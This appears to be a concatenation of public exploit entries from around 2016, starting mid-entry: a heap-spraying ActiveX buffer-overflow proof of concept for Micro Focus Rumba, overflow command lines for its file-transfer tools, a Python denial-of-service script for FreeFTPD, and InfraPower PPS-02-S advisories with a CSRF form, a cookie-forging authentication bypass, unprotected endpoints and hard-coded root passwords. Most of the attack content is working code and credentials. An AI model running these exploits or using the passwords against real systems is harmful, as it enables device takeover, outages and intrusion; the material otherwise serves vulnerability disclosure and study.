&serendipity[new_timestamp]=2016-10-24 15:02
&serendipity[isdraft]=false
&serendipity[allow_comments]=true
&serendipity[had_categories]=1
&serendipity[propertyform]=true
&serendipity[properties][access]=public
&ignore_password=
&serendipity[properties][entrypassword]=
&serendipity[change_author]=4
# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231
# Version: <= 9.3
# Tested on: Internet Explorer 11 on windows 7
# CVE : CVE-2016-5228
1. Description
Stack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument.
2. Proof of Concept
The code below sprays the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you.
<html>
<head>
<object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='_vulActiveX'>
</object>
</head>
<body>
<div id="blah"></div>
<script language="javascript">
function vuln(){
// 272 Junk Data
// 272 + "\x43\x43\x43\x43" = EDX = 43434343
//
// If we change the edx to an address that point to a valid address
// We will have control over EIP
// 0x20302228
// Overwrite the stack
var evil_payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
// Addres pointing to our sprayed heap
var EDX = "\x28\x22\x30\x20";
evil_payload += EDX;
_vulActiveX.PlayMacro(evil_payload);
}
// This create blocks of memory with data we control
// And attaches the data to a button.title
// By doing this we have a predicatable place in memory containing our data
// This data can by used to place shellcode in it and can be used like in this case to
// point to valid address to overwrite EIP
// Heap Spraying technique of corelanc0d3r
// See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x104;
var jmp_address="\x28\x22\x30\x20";
junk = unescape("%u4747%u4747"); // <-------- EIP Value
while(junk.length < 0x1000) junk += junk;
// 20302290
shellcode = unescape("%u2290%u2030%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444");
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800 - offset - shellcode.length);
while(data.length < 0x80000) data += data
// Targets:
// FireFox: 0x20302210
// IE 8, 9 and 10/11: 0x20302228
for(var i = 0; i < 0x500; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
div_container.appendChild(obj);
}
</script>
<input type="button" onclick="javascript:vuln()" value="exploit" >
</body>
</html>
# Exploit Title: Micro Focus Rumba 9.4 Multiple Local Stack-overflow
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://www.microfocus.com/
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231
# Version: 9.4
# Tested on: Internet Explorer 11 on windows 7
# CVE :
1. Description
Multiple local stack overflow vulnerabilities which can used when to exploit when learning exploit development.
Note: Rumba uses send.exe and receive.exe to send and receive files so it might be possible to exploit this remotely.
2. Proof of Concept
The code below sprayes the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you.
C:\Program Files (x86)\Micro Focus\RUMBA\System>send c:\aaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
RUMBA Command-line File Transfer Utility
SEH + NSEH overwritten
C:\Program Files (x86)\Micro Focus\RUMBA\System>receive.exe c:\aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
RUMBA Command-line File Transfer Utility
from ftplib import FTP
print '''
`,;'++';,`
`'++++++++++++++++;`
.+++++++++++++++++++++++'`
;++++++:` `:++++++:
'++++'` , +`. :; .`` .'++++;
:++++, '+ `+.+.+`+':+:+ +:` + :++++,
++++, `+ +`+.+`+':+.+ +:'.+. :++++
,+++; +` +:':+`+',+`+,++.+:+ +, '+++.
'+++` `++ ;+ ,+:'; ,: ;;+`++ +.+`+. `+++;
+++; `: ++' + '+++ :++;++,+: + '+++
+++, ++' ,+ .;+++++',` : + ',+ :+++
+++` ++ +:+ +: .+++++++++++++++; : ++'+,,`,+++
+++` `+;.+'` '++++++++++++++++++++. ;+;+:.+` .+++
'++` ++ +,.` '++++++++++++++++++++++++. +;.+`+ ,++;
:++, +:++`' ,+++++++++++++''++++++++++++ `+.+: :++.
++; . +:+: +++++++++'. `;++++++++. .+' ++ +++
+++ ;++ +: ++++++++, .+++++++; ;:+;+ +++
:++ ;+,++ `+++++++, `++++++' +,+,.+ `++.
++: `+`+'. ++++++' ;+++++' +`;++ '++
'++ ,+,' ++++++, .+++++; ++ ++:
++. ' + ++++++` +++++. ` '+.:++
;++ +; + ;+++++` +++++ :++ ; ++:
++, '++ `+++++, `+++++ +` `. :++
,++ ` ;+: +++++' :++++` ,+ ++`
++; .+++` .+++++ +++++ '++:: ++'
++` ;+':: +++++. ++++` '`+++`.++
.++ `++ +++++ '++++ +: ++`
'++ `++; '++++` ++++ ++;
++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++:
++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ +;,` ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++:
;++ `.,. +++++
+++ '..': ,++'` ,+++` `++++
+++ +;+` ++++: ++++++' ++++++' ++++
+++ :.'`; ++++: ++` :+, ++` ,+: ++++
'++ `+++. ++++; : + : + ,++++
;++ :` ++++' `+++++
,++ `+;;+ +++++ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; :;;;;;;;;;;;;;;++++++.
`++ ++,+ +++++ :+++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++'
++ ` `, ;++++ ++++++++++++++++++++++++++++++++++++: ++++++++++++++++++++
++` .+++.`++++: ++++++++++++++++++++++++++++++++++++ `++++++++++++++++++,
++: ','+: +++++ :+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++ ++++:,:,,:,,+++,.
;++ +:`, '++++` +++++. +++++` ++++ '.+' ++,
++ +++ +++++ :+++++ ++++++ ;++++ ++.+ ++
++, ';`+' +++++` ++++++ ++++++ ++++` + +. :++
'++ :++;, .+++++ ++++++` ++++++, +++++ ++:
`++ +` :+, +++++: .++++++' :++++++; .++++. +` `++
++' ;++` `+++++` ,+++++++'` :+++++++; +++++ :++` +++
,++ ,: + '+++++ .++++++++++';:;++++++++++: +++++ ;+' ++`
+++ :+' ++++++ ++++++++++++++++++++++` +++++. ;+` , +++
,++ :++`;+` ++++++` :++++++++++++++++++' +++++' `+,+;`;`++.
+++ : ++.+ `++++++: :++++++++++++++; ,+++++' ++`+ +++
`++, +;+` `+++++++` `:++++++++:` ++++++' ++ ,+; ;++`
'++ :+ `' ++++++++` `+++++++; +++ ;`++;
+++ `:`+ +++++++++: ,++++++++, +,++ +++
+++ +++;' :+++++++++++';::;'+++++++++++ ;+ +,' +++
,+++ +++.+.: +++++++++++++++++++++++++. '' ++ + +++`
;++' ` +`+`;. `+++++++++++++++++++++, :,+,:+: +++,
;+++ ,++:'++` ,+++++++++++++++; ++ .++ ` +++:
;+++ + +`+ +; .;'++++':` ++.+':++ +++:
:+++` `++, :;+`+; ::+ +,+`+. .+++,
.+++' `, +`:'+ +,+` +, +:+.++:';+ ++ ++++`
++++. +':++: +;+` ': +:+ +.+ +' :++++
:++++. . +,+,;+'` '; :'+`+'+ ,++++,
+++++: ` +`+'` '; `++` ;++++'
`++++++: ;' + :++++++`
`+++++++':. `,:+++++++'
.++++++++++++++++++++++.
`:'++++++++++++',
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit
# Date: 2016.10.30
# Exploit Author: Greg Priest
# Version: FreeFTPD_1.0.8
# Tested on: Windows XP, Windows 7 x64
'''
ftp_ip = raw_input("FTP server IP:")
killerstring = 'A' * 500
ftp = FTP('127.0.0.1')
ftp.login('anonymous', 'h4ck3r@h4ck3r.net')
print ftp.login
print "SERVER KILLED"
FTP.mkd(ftp, killerstring)
InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with admin
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5375
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php
27.09.2016
--
PoC:
<html>
<body>
<form action="http://192.168.0.17/SNMP.php?Menu=SMP" method="POST">
<input type="hidden" name="SNMPAgent" value="Enable" />
<input type="hidden" name="CommuintyString" value="public" />
<input type="hidden" name="CommuintyWrite" value="private" />
<input type="hidden" name="TrapsVersion" value="v2Trap" />
<input type="hidden" name="IP" value="192.168.0.254" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The device does not properly perform authentication, allowing
it to be bypassed through cookie manipulation. The vulnerable function
checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
or not, allowing easy bypass of the user security mechanisms.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5374
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
27.09.2016
--
(example) System.php:
---------------------
1: <?php
2:
3: require_once("Function.php");
4: session_start();
5: if(!checkLogin())
6: header('Location: Login.php');
7:
---------------------------------------
Function.php:
-------------
155: function checkLogin(){
156: if(empty($_SESSION['Login']))
157: return false;
158: return true;
159: }
160:
--------------------
'Sessioned' scripts:
➜ www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Login.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/System.php:4: session_start();
/Users/liwomac/Desktop/infrapower_files/www/User.php:3: session_start();
➜ www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:256: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Function.php:266: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:53: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:63: session_destroy();
➜ www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:11: if(isset($_SESSION['ite'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:12: $this->init($_SESSION['ite']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
PoC:
javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
--
InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: Insecure Direct Object References occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system directly, for
example APIs, files, upload utilities, device settings, etc.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5373
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
27.09.2016
--
GET /ConnPort.php
GET /CSSSource.php
GET /dball.php
GET /doupgrate.php
GET /IPSettings.php
GET /ListFile.php
GET /Menu.php
GET /Ntp.php
GET /PDUDetails_Ajax_Details.php
GET /PDULog.php
GET /PortSettings.php
GET /production_test1.php ("backdoor")
GET /UploadEXE.php
InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a use of hard-coded credentials. The IP
dongle firmware ships with hard-coded accounts that can be used to gain
full system access (root) using the telnet daemon on port 23.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5371
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
27.09.2016
--
# cat /etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
# showing accounts in root group:
Username: root
Password: 8475
--
Username: service
Password: ipdongle
--
Username: www
Password: 9311
--
Username: www2
Password: 9311
# showing other less-privileged accounts:
Username: user
Password: 8475
--
Username: admin
Password: 8475
--------
/mnt/mtd # echo $SHELL
/sbin/root_shell.sh
/mnt/mtd # cat /sbin/root_shell.sh
#!/bin/sh
trap "" 2 3 9 24
# check login
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
if [ "$passWork" = "1" ]; then
login_file=/mnt/mtd/root_login
now_timestamp=`date +%s`
if [ -f $login_file ]; then
line=`wc -l $login_file | cut -c 1-9`
if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
pre_result1=`echo $pre_login | cut -d " " -f 1`
pre_result2=`echo $pre_login | cut -d " " -f 2`
pre_result3=`echo $pre_login | cut -d " " -f 3`
if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
if [ "$result" != "success" ]; then
echo $result
exit 0
fi
fi
fi
fi
echo -n "password:"
read pass
if [ "$pass" != "999" ]; then
echo "wrong password"
echo fail $now_timestamp >> $login_file
exit 0
fi
echo success $now_timestamp >> $login_file
fi
/bin/sh
/mnt/mtd #
--------
/mnt/mtd # ls
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
--------
/mnt/mtd # df -h
Filesystem Size Used Available Use% Mounted on
tmpfs 256.0M 4.0K 256.0M 0% /tmp
/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
--------
/www # ls -al
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
